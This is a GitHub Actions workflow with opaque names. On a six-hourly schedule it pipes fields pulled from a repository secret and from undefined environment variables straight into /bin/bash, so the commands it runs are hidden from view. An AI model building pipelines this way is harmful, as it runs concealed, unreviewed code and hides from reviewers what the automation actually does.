name: songliwen1986

on:
  workflow_dispatch:
  schedule:
    - cron: '14 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: songliwen1986
        env:
          owo25212: ${{ secrets.owo25212 }}
        run: |
          echo $owo25212 | jq -r .ztw3038 | /bin/bash
          echo $v111 | jq -r .vf102 | /bin/bash
          echo $l54 | jq -r .nr05 | /bin/bash

